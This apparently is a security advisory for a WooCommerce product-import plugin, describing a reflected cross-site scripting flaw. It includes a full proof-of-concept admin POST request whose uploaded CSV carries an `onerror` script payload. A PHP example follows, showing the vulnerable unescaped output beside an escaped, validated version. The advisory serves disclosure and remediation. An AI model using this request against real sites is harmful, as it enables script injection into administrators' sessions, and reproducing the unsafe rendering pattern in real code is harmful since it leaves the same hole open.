The plugin does not sanitise and escape the imported data before outputting it back in the page, leading to Reflected Cross-Site Scripting.
POST /wp-admin/admin.php?page=woo_pi&tab=import HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------26500037853062016269678995697
Content-Length: 1234
Connection: close
Cookie: [logged in admin]
Upgrade-Insecure-Requests: 1

-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="upload_method"

upload
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="csv_file"; filename="a.csv"
Content-Type: text/csv

Name,Content,Price,Gender,sku,Multi_cat,Thumbnail
Pumpkin spice cupcake, Pumpkin spice cupcake 3",5.99, Bakery,128,Dessert,<img src onerror=alert(/XSS/)>
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="csv_file_ftp[passive]"

auto
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="delimiter"

,
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="category_separator"

|
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="parent_child_delimiter"

>
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="action"

upload
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="page_options"

csv_file
-----------------------------26500037853062016269678995697--
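
The missing output escaping described above, shown beside a hardened form. This is an added example, not the plugin's code: the function names are hypothetical, the preview-table markup is an assumption, and htmlspecialchars() stands in for WordPress's esc_html() so the script runs outside WordPress.

```php
<?php
// Added example: not the plugin's code. All function names are hypothetical.

// Header and row as sent in the csv_file part of the request above.
const SAMPLE_CSV = "Name,Content,Price,Gender,sku,Multi_cat,Thumbnail\n"
    . "Pumpkin spice cupcake, Pumpkin spice cupcake 3\",5.99, Bakery,128,Dessert,<img src onerror=alert(/XSS/)>";

/** Parse CSV text into a list of rows (arrays of raw cell strings). */
function parse_rows(string $csv): array {
    $rows = [];
    foreach (explode("\n", trim($csv)) as $line) {
        $rows[] = str_getcsv($line, ',', '"', '');
    }
    return $rows;
}

/** Vulnerable pattern: imported cell text is concatenated into markup as-is. */
function render_row_unsafe(array $cells): string {
    return '<tr><td>' . implode('</td><td>', $cells) . '</td></tr>';
}

/** Escape for an HTML text node; inside WordPress use esc_html() instead. */
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hardened pattern: every imported cell is escaped at the point of output. */
function render_row_safe(array $cells): string {
    return '<tr><td>' . implode('</td><td>', array_map('h', $cells)) . '</td></tr>';
}

/** Input-side check for the Thumbnail column: keep only http(s) URLs. */
function sanitise_thumbnail(string $value): string {
    $value  = trim($value);
    $scheme = strtolower((string) parse_url($value, PHP_URL_SCHEME));
    $ok = filter_var($value, FILTER_VALIDATE_URL) !== false
        && in_array($scheme, ['http', 'https'], true);
    return $ok ? $value : '';
}

[$header, $row] = parse_rows(SAMPLE_CSV);
$thumbIndex = array_search('Thumbnail', $header, true);

echo render_row_unsafe($row), "\n"; // Thumbnail cell reaches the page as live markup
echo render_row_safe($row), "\n";   // same cell is rendered as inert text
var_dump(sanitise_thumbnail($row[$thumbIndex])); // non-URL value is rejected on import
```

Escaping at output is the fix for the reflected case; the import-time URL check is defence in depth for a column that is only ever meant to hold an image location.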